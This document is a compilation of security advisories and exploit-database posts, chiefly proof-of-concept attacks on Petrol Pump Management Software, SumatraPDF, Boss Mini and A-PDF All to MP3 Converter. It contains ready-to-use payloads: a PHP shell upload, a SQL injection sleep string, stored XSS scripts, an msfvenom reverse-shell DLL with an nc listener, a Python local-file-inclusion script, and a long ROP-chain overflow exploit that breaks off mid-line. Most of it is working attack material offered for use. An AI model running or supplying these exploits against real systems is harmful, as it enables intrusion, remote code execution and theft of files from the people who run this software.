### Impact
Windows-Only: The NSIS installer makes a system call to open cmd.exe via NSExec in the `.nsh` installer script. NSExec by default searches the current directory of where the installer is located before searching `PATH`. This means that if an attacker can place a malicious executable file named cmd.exe in the same folder as the installer, the installer will run the malicious file.

### Patches
Fixed in https://github.com/electron-userland/electron-builder/pull/8059

### Workarounds
None, it executes at the installer-level before the app is present on the system, so there's no way to check if it exists in a current installer.

### References
https://cwe.mitre.org/data/definitions/426.html
https://cwe.mitre.org/data/definitions/427

**Package**

npm app-builder-lib (npm)

**Affected versions**

< 24.13.1

**Patched versions**

24.13.2

**Description**

**Impact**

Windows-Only: The NSIS installer makes a system call to open cmd.exe via NSExec in the .nsh installer script. NSExec by default searches the current directory of where the installer is located before searching PATH. This means that if an attacker can place a malicious executable file named cmd.exe in the same folder as the installer, the installer will run the malicious file.

**Patches**

Fixed in electron-userland/electron-builder#8059

**Workarounds**

None, it executes at the installer-level before the app is present on the system, so there's no way to check if it exists in a current installer.

**References**

https://cwe.mitre.org/data/definitions/426.html  
https://cwe.mitre.org/data/definitions/427

**References**

*   GHSA-r4pf-3v7r-hh55
*   electron-userland/electron-builder#8059
*   electron-userland/electron-builder@8f4acff

 mmaietta published to electron-userland/electron-builder

Mar 2, 2024

Published to the GitHub Advisory Database

Mar 4, 2024

Reviewed

Mar 4, 2024

Last updated

Mar 4, 2024

GHSA-r4pf-3v7r-hh55: electron-builder's NSIS installer - execute arbitrary code on the target machine (Windows only)

Petrol Pump Management System version 1.0 suffers from a remote shell upload vulnerability. This is a variant vector of attack in comparison to the original discovery attributed to SoSPiro in February of 2024.

    # Exploit Title: File Upload Remote Code Execution (RCE) in Petrol PumpManagement Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27747# Description: File Upload vulnerability in Petrol Pump Management Softwarev.1.0 allows an attacker to execute arbitrary code via a crafted payload tothe email Image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the phpinfo.php file in "Image" field5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page6. The content of phpinfo.php file is given below:<?php phpinfo();?># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27747

Petrol Pump Management System 1.0 Shell Upload

Petrol Pump Management Software version 1.0 suffers from a remote SQL injectionvulnerability.

    # Exploit Title: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0.# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27746# Description: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the email address parameter in the index.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with username: test@test.com';SELECT SLEEP(10)# andPassword=test3. Page will load for 10 seconds because of time-based sql injection# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746

Petrol Pump Management Software 1.0 SQL Injection

Petrol Pump Management Software version 1.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27743# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the Address parameter in the add_invoices.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"4. Fill the payload "<script>alert(0)</script>" in "Address" field5. Stored XSS will be present in "http://localhost/fuelflow/admin/manage_invoices.php" page# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743-----# Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27744# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the xss.svg file in "Image" field5. Stored XSS will be present in "http://localhost/fuelflow/assets/images/xss.svg" page6. The content of the xss.svg file is given below:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/>  <script type="text/javascript">    alert("XSS by Shubham Pandey");  </script></svg># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744

Petrol Pump Management Software 1.0 Cross Site Scripting

SumatraPDF version 3.5.2 suffers from a DLL hijacking vulnerability using CRYPTBASE.DLL. DLL hijacking in this version was already discovered by Ravishanka Silva in February of 2024 but the findings did not include this DLL.

    SumatraPDF 3.5.2 DLL Hijack# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack# Date: 03.03.2024# Exploit Author: Krishna Vamshi Katta Rokkaiah# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 11# CVE : CVE-2024-25884Description:In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.Proof of Concept:1. Use MSFVenom to create a malicious DLL:msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL2. Copy this file to the Sumatra PDF installation folder:C:\Users\<username>\AppData\Local\SumatraPDF\3. Start a listener in attacking system:nc -nlvp 77774. Start the Sumatra PDF application and notice a reverse shell in the attacking system.Demo:https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view

SumatraPDF 3.5.2 DLL Hijacking

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Boss Mini 1.4.0 Local File Inclusion

A-PDF All to MP3 Converter version 2.0.0 overflow exploit with DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain.

    #!/usr/bin/python# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain# Date: 16 November 2023# Exploit Author: George Washington# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm# Version: 2.0.0# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64# Based on: https://www.exploit-db.com/exploits/17275# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe# Video: https://youtu.be/_JEgdKjbtpIimport socket, structfile = "1.wav"size = 8000############ Parameters for HeapCreate() ############EXE = b"ZZZZ"                          # HeapCreate()EXE += b"AAAA"                         # RETEXE += struct.pack("<I", 0x00040000)   # Parameter 1 0x00040000EXE += struct.pack("<I", 0x00000000)   # Parameter 2 0x00000000EXE += struct.pack("<I", 0x00000000)   # Parameter 3 0x00000000EXE += b"YYYY"                         # HeapAlloc()EXE += b"BBBB"                         # RETEXE += b"CCCC"                         # Parameter 1 hHandleEXE += struct.pack("<I", 0x00000008)   # Parameter 2 0x00000008EXE += struct.pack("<I", 0x00000500)   # Parameter 3 0x00000500EXE += struct.pack("<I", 0x1002dd98)   # _memcpy_s()EXE += b"DDDD"                         # heap pointerEXE += b"EEEE"                         # heap pointerEXE += struct.pack("<I", 0x00000500)   # sizeEXE += b"GGGG"                         # shellcode pointerEXE += struct.pack("<I", 0x00000500)   # sizejunk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1#######################      STACK PIVOT      ###########################SEH = struct.pack("<I", 0x005CE870) # 0x005CE870  add esp 0x800, 4 pops, ret [alltomp3.exe]#######################    1. Get Stack Pointer to point to ZZZZ    ###########################ROP = struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xffffff1c)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to ZZZZ#######################    2. Get and set ZZZZ to HeapCreate        ###########################ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += b"A" * 0x10ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IATROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += struct.pack("<I", 0x41414141)# eax has HeapCreateROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    3. Set RET                               ###########################ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1001939e)  # 0x1001939e: add esp, 0x000001A0 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** #######################    4. Go to HeapCreate                      ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffea4)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret  ;  (1 found) // pad it# when heap create finishes, eax will have hHeapROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    5. Get Stack Pointer to point to YYYY    ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffe58)ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*3ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to YYYY#######################    6. Get and set YYYY to HeapAlloc        ###########################ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += b"A" * 0x10ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IATROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += struct.pack("<I", 0x41414141)# eax has HeapCreateROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    7. Set RET                               ###########################ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)ROP += struct.pack("<I", 0x10014d32)  # 0x10014d32: add esp, 0x00000280 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    8. Set hHEAP                             ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found) <- should return here and start executing hereROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** #######################    9. Go to HeapAlloc                      ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffdcc)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)# when heap create finishes, eax will have hHeapROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret  ;  (1 found) // pad itROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    10. Get Stack Pointer to point to DDDD   ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffd5c)ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*3ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to DDDD#######################    12. Set RET                              ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += b"A"*0x10ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    13. DESTIN                                ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]* #######################    14. SOURCE                                ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # 